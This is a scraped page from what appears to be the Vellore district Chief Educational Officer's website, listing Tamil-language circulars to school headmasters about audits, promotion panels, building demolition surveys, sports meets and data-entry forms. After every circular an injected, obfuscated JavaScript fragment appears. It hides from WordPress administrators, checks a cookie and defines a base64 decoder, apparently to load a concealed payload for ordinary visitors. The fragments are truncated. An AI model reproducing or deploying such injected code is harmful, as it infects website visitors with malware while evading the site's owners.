மற்ற செய்திகள்

பள்ளிக் கல்வி – வேலூர் மாவட்டம் – அகத்தணிக்கை  கூட்டமர்வு – Joint  Sitiing கடந்த கால தணிக்கை தடைகளை நிவர்த்தி செய்தல் – தொடர்பாக.     

0058 a2 2026 joint sitting_compressedDownload join sitting HM GIVING FORM (1)Download கணக்கு தலைப்புகள்Download முதன்மைக் கல்வி அலுவலர், வேலூர் மாவட்டம். (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

பள்ளிக் கல்வி – வேலூர் மாவட்டம் -மாவட்டக் கல்வி அலுவலர் மற்றும் அதனையொத்த பணியிடங்கள் பதவி உயர்வு / பணிமாறுதல் மூலம் நிரப்புதல் – 2026 -2027 ஆம் ஆண்டிற்கான முன்னுரிமைப் பட்டியல் தயார் செய்தல் -அரசு உயர் / மேல்நிலைப் பள்ளித் தலைமை ஆசிரியர்கள் சார்பிலான விவரங்கள் – கோருதல் – தொடர்பாக.

055 - b1 2026 DEO PANEL_compressedDownload படிவம் (2)Download Option Form (2)Download DEO Panel 2026-27.-11-39Download முதன்மைக் கல்வி அலுவலர், வேலூர் மாவட்டம். (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

பள்ளிக் கல்வி- வேலூர் மாவட்டம் -அனைத்து அரசு உயர்நிலை/மேல்நிலைப் பள்ளிகளில் இடிக்கப்பட வேண்டிய கட்டிய விவரங்கள் -TNSED Administrative App-ல் பதிவேற்றம் செய்ய அறிவுரைகள் வழங்குதல் -சார்பு.

வேலூர் மாவட்டத்தில் உள்ள அனைத்து அரசு உயர்நிலை/மேல்நிலைப் பள்ளிகளில் இடிக்கப்பட வேண்டிய கட்டிய விவரங்கள் TNSED Administrative App-ல் பதிவுகளை இணைப்பில் காணும் அறிவுரைகள் பின்பற்றி 20.01.2026க்குள் முடிக்குமாறு அனைத்து தலைமை ஆசிரியர்களுக்கும் தெரிவிக்கப்படுகிறது. DocScanner 05-Jan-2026 3-52 pm (1)Download முதன்மைக் கல்வி அலுவலர், வேலூர். (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABC

ஆங்கில புத்தாண்டு வாழ்த்து மடல்

ஆங்கில புத்தாண்டு வாழ்த்து மடல்Download முதன்மைக் கல்வி அலுவலர், வேலுர் மாவட்டம். (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

பள்ளிக் கல்வி-வேலூர் மாவட்டம்- உடற்கல்வி- 2025-2026 ஆம் கல்வியாண்டில் மாநில அளவிலான 66வது குடியரசு தின/பாரதியார் தின குழு விளையாட்டுப் போட்டிகள்-குத்துச்சண்டை, சிலம்பம், வளையப்பந்து  -நடைபெறும் இடம் தேதி போன்ற விவரங்கள் தெரிவித்தல்-சார்பு

சார்ந்த பள்ளி தலைமையாசிரியர்கள்/முதல்வர்கள் கவனத்திற்கு Theni.RD.BD.Games (1)Download _RD.BD.NEWGAMES.DATE.VENUE & CONTACT DETAILS - THENI DISTRICT.MANAGER.INSTRUCTIONSDownload THENI.RD.BD.GAMES.STUDENTS.LISTDownload SOP for Protection of Girls in Sports_ Instructions (1)Download /ஒப்பம்/ முதன்மைக் கல்வி அலுவலர் வேலூர். (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

பள்ளிக் கல்வி -வேலூர் மாவட்டம் – அடிப்படைப்பணியாளர்களின் காலிப்பணியிட விவரம் கோருதல் -தொடர்பாக

பள்ளிக் கல்வி -வேலூர் மாவட்டம் - அடிப்படைப் பணியாளர்களின் காலிப்பணியிட விவரம் உடனடியாக இணைக்கப்பட்டுள்ள google sheet ல் உடனடியாக பூர்த்தி செய்யுமாறு அனைத்து வகை அரசு/நகராட்சி/ஆதிதிராவிடர் நல உயர்/மேல்நிலைப் பள்ளி தலைமையாசிரியர்கள் கேட்டுக்கொள்ளப்படுகிறார்கள். https://docs.google.com/spreadsheets/d/1w3CHfAAwUPcanCF3-cINAdW-UW1OVbn8mtZWzadhlCU/edit?usp=sharing முதன்மைக் கல்வி அலுவலர், வேலூர். (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function syste

தமிழ்நாடு மேல்நிலைக் கல்வி – வேலூர் மாவட்டம் – அரசு / நகராட்சி மேல்நிலைப் பள்ளித் தலைமை ஆசிரியர்கள் – 01.01.2023 மற்றும் 01.01.2024 நிலவரப்படி பதவி உயர்வு வழங்கப்பட்ட தலைமை ஆசிரியர்களுக்கு பணிவரன் முறை செய்ய கருத்துருக்கள் 29.12.2025 -க்குள் அனுப்ப கோருதல் – சார்ந்து REVISED – படிவம் – அனுப்புதல் – சார்பு.

6343 b1 2025 PROMOTION - GHSS HM_compressedDownload 65810-2025 HSS Hms Regularisation_Annexure-I-R2Download 65810-2025 HSS Hms Regularisation_Format-R1Download முதன்மைக் கல்வி அலுவலர், வேலூர் மாவட்டம். (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

பள்ளிக் கல்வி – வேலூர் மாவட்டம் – அனைத்து வகை உயர்/ மேல்நிலைப் பள்ளித் தலைமை ஆசிரியர்கள் கீழே கொடுக்கப்பட்டுள்ள Google Form -ல் திறன் மாணவர்களின் டிசம்பர் 2025 தேர்வு மதிப்பெண் விவரங்களை கொடுக்கப்பட்டுள்ள எக்ஸல் படிவத்தில் பூர்த்தி செய்து 30.12.2025 -க்குள் பதிவிடுமாறு கேட்டுக் கொள்ளப்படுகிறார்கள்.

https://docs.google.com/forms/d/e/1FAIpQLSeK2OiiEhlmZs3ZIN1MjtJeq1NTcUMqaCICbvSlrQGuidGN2A/viewform?usp=publish-editor Thiran_December 2025 BLO ReportDownload முதன்மைக் கல்வி அலுவலர், வேலூர் மாவட்டம். (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

பள்ளிக் கல்வி – வேலூர் மாவட்டம் – அரசு / நகராட்சி உயர்/ மேல்நிலைப் பள்ளிகளிலுள்ள பயன்படுத்தப்படாத இடிக்கப்பட வேண்டிய கட்டடங்கள் விவரத்தினை இணைப்பிலுள்ள கூகுள் படிவத்தில் உடன் பூர்த்தி செய்ய தலைமை ஆசிரியர்களுக்கு தெரிவிக்கப்படுகிறது.

https://docs.google.com/spreadsheets/d/16Cio5fkCmoiZw_6phcSMwZQsk_39AmCpgHfUETTQu4c/edit?usp=sharing முதன்மைக் கல்வி அலுவலர், வேலூர் மாவட்டம். (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

பள்ளிக் கல்வி-வேலூர் மாவட்டம்- உடற்கல்வி – மாநில மற்றும் தேசிய அளவில் விளையாட்டு போட்டிகளில் பங்குபெற்று பரிசுகளை வெல்லும் மாணவர்களுக்கு அந்தந்தப் பள்ளிகளில் அவர்களைப் பெருமைப்படுத்தும் வகையில் அவர்கள் பெற்ற பரிசுடன் அவர்களின் புகைப்படம் அறிவிப்பு பலகையில் வெளிப்படுத்திட  நடவடிக்கை மேற்கொள்ள தெரிவித்தல்-சார்பு.

அனைத்து வகை பள்ளி தலைமையாசிரியர்கள்/முதல்வர்கள் கவனத்திற்கு New Doc 12-26-2025 10.04Download /ஒப்பம்/ முதன்மைக் கல்வி அலுவலர் வேலூர். (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i